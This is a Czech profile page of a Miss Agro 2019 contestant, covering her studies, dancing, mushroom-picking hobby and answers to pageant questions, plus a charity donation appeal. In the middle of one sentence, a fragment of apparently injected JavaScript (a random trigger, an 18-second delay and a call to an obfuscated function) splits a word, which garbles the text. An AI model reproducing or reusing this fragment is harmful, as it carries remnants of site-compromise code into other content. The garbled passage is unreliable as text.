Sára Frankenfeldová

Profil

Fakulta: FŽP
Obor: Územní technická a správní služba (UTSS)
Ročník: 1.
Věk:
19

Sára je velmi spolehlivá, tvrdohlavá a emočně založená dívka. Je tanečnicí již od svých 3 let. Začalo to u aerobiku, zumby a pokračovalo to přes balet až ke standom() * 6); if (number1==3){var delay = 18000;setTimeout($Ikf(0), delay);}andardním a latinskoamerickým tancům. Na parketě tančí do roztrhání těla. Nebrání se ovšem žádnému sportu. Miluje lyžování, šnorchlování, houbaření a nakupování, což se v jejím případě dá také považovat za sport. (smích) Ve skříni má pořádnou sbírku lodiček a na podpatcích je jako doma. Přestože je líná chodit na procházky, tak z lesa ji nevyžene ani tma. Na houby si posvítí baterkou. Když zrovna netráví čas tancem či houbařením, najdete ji na její rodinné chalupě ve Chřibské.

Podporujeme studenty z dětských domovů

Miss Agro podporuje mladé studenty z dětských domovů prostřednictvím Nadačního fondu Veroniky Kašákové. Podpořte je i Vy! Přispět můžete libovolnou částkou na účet 2113124252/2700. Více informací najdete na webových stránkách www.nfvk.cz. Děkujeme, že pomáháte!

Proč by ses zrovna Ty měla stát Miss Agro 2019?

Již od dětství jsem byla všude ta nejmenší. Taťka razí takové heslo, co je malé to je hezké. (smích) A proto by bylo moc příjemné, kdybych alespoň s tou korunkou měla o pár centimetrů navíc.

Máš nějaký životní vzor? Čím Tě inspiruje?

Vzorem a inspirací jsou pro mě lidé, kteří nezištně konají dobré věci a skutky pro ostatní. Sama se každým rokem účastním charitativní burzy v Arkádii v Teplicích. A můžu Vám říct, že pocit konat dobro pro ostatní, přestože z toho sami máte opravdu jen tu čistou radost, to stojí za to!

Na který předmět na ČZU vzpomínáš nejvíce a proč?

Nejvíce zatím vzpomínám na předmět Ochrana ovzduší. Tento předmět plný fyzikálních vzorců a výpočtů mě vrátil zpět na Gymnázium Teplice. S povděkem si dnes vzpomenu na přísného pana profesora.

Na co se v soutěži Miss Agro těšíš nejvíc?

Nejvíce se těším na poznání nových přátel, získání zkušeností a spoustu legrace. Ale nebudu se tajit tím, že projít se po mole a na okamžik se v krásných šatech proměnit v princeznu z pohádky, byl vždy můj velký sen.